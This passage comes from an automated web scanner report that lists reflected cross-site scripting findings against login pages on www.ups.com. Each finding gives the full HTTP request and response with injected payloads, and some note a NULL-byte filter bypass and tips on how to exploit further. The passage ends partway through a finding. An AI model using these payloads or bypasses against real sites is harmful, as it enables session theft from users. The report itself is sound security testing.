Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
c76daa/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
actionUrl = "/one-to-one/login?ID=100&
...[SNIP]...

1.399. https://www.ups.com/account/am/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95b6"%20a%3db%2029ba2d4500a was submitted in the REST URL parameter 2. This input was echoed as e95b6" a=b 29ba2d4500a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/ame95b6"%20a%3db%2029ba2d4500a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/ame95b6" a=b 29ba2d4500a/start">
...[SNIP]...

1.400. https://www.ups.com/account/am/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ab7"%20a%3db%2059b95f1602b was submitted in the REST URL parameter 3. This input was echoed as 52ab7" a=b 59b95f1602b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start52ab7"%20a%3db%2059b95f1602b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/am/start52ab7" a=b 59b95f1602b">
...[SNIP]...

1.401. https://www.ups.com/account/am/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload bdcfa%0ae0b29bf97aa was submitted in the REST URL parameter 3. This input was echoed as bdcfa
e0b29bf97aa
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/startbdcfa%0ae0b29bf97aa HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa
e0b29bf97aa
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa

...[SNIP]...

1.402. https://www.ups.com/account/am/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 832ad'%3b70dba7c9613 was submitted in the REST URL parameter 3. This input was echoed as 832ad';70dba7c9613 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start832ad'%3b70dba7c9613 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
7c9613';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.403. https://www.ups.com/account/am/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00e96d0</script><script>alert(1)</script>eeee4ba8d58 was submitted in the loc parameter. This input was echoed as e96d0</script><script>alert(1)</script>eeee4ba8d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start?loc=en_US%00e96d0</script><script>alert(1)</script>eeee4ba8d58&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script><script>alert(1)</script>eeee4ba8d58';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script>
...[SNIP]...

1.404. https://www.ups.com/account/am/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %004ec10'-alert(1)-'cf7523a708f was submitted in the loc parameter. This input was echoed as 4ec10'-alert(1)-'cf7523a708f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start?loc=en_US%004ec10'-alert(1)-'cf7523a708f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.405. https://www.ups.com/account/am/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0056fb2"><script>alert(1)</script>5e2077907d2 was submitted in the loc parameter. This input was echoed as 56fb2"><script>alert(1)</script>5e2077907d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start?loc=en_US%0056fb2"><script>alert(1)</script>5e2077907d2&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_56fb2"><script>alert(1)</script>5e2077907d2&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_56fb2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B5e2077907d2%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.406. https://www.ups.com/account/us/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44722"%20a%3db%20d499cf7b97a was submitted in the REST URL parameter 2. This input was echoed as 44722" a=b d499cf7b97a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection point here is the value attribute of an input of type Hidden: hidden inputs are not rendered and receive no mouse or focus events, which limits what an injected event-handler attribute can achieve without first breaking out of the tag.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us44722"%20a%3db%20d499cf7b97a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us44722" a=b d499cf7b97a/start?appid=OPENACCT">
...[SNIP]...

1.407. https://www.ups.com/account/us/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 1c510%0a5bec88f7632 was submitted in the REST URL parameter 2. This input was echoed as 1c510
5bec88f7632
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript rest-of-line comment into which our data is being copied: the injected line break ends the comment, so whatever follows on the next line is parsed as live JavaScript rather than as comment text. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place; the URL-encoded NULL byte (%00) prefix that defeats the character filter on the loc parameter elsewhere in this report is the first bypass to try against the path segment.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us1c510%0a5bec88f7632/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us1c510
5bec88f7632
/start?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/a
...[SNIP]...

1.408. https://www.ups.com/account/us/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57780'%3bbaf8e0aa31b was submitted in the REST URL parameter 2. This input was echoed as 57780';baf8e0aa31b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us57780'%3bbaf8e0aa31b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
actionUr
...[SNIP]...

1.409. https://www.ups.com/account/us/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dd7"%20a%3db%20a3fcf1e4a73 was submitted in the REST URL parameter 3. This input was echoed as a8dd7" a=b a3fcf1e4a73 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As in 1.406, the reflection point is the value attribute of a hidden input, which constrains what an injected attribute can do on its own.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/starta8dd7"%20a%3db%20a3fcf1e4a73 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us/starta8dd7" a=b a3fcf1e4a73?appid=OPENACCT">
...[SNIP]...

1.410. https://www.ups.com/account/us/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload b76c7%0a1e4ac2a860 was submitted in the REST URL parameter 3. This input was echoed as b76c7
1e4ac2a860
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript rest-of-line comment into which our data is being copied: the injected line break ends the comment, and the text on the following line is parsed as code. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/startb76c7%0a1e4ac2a860 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40718


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us/startb76c7
1e4ac2a860
?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account
...[SNIP]...

1.411. https://www.ups.com/account/us/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ead4'%3be1cc69c801d was submitted in the REST URL parameter 3. This input was echoed as 2ead4';e1cc69c801d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start2ead4'%3be1cc69c801d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
ENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
actionUrl = "/
...[SNIP]...

1.412. https://www.ups.com/account/us/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b6c8d"><script>alert(1)</script>62dcb8e5408 was submitted in the loc parameter. This input was echoed as b6c8d"><script>alert(1)</script>62dcb8e5408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start?loc=en_US%00b6c8d"><script>alert(1)</script>62dcb8e5408&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11232


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_b6c8d"><script>alert(1)</script>62dcb8e5408&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_b6c8d%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B62dcb8e5408%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.413. https://www.ups.com/account/us/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %004d539</script><script>alert(1)</script>a033567d25f was submitted in the loc parameter. This input was echoed as 4d539</script><script>alert(1)</script>a033567d25f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The closing tag works even though the reflection point sits inside a // comment: the HTML parser ends the script element at the first </script> it encounters, before the JavaScript parser ever sees the comment, so the injected <script>alert(1)</script> that follows is parsed as a fresh script block.

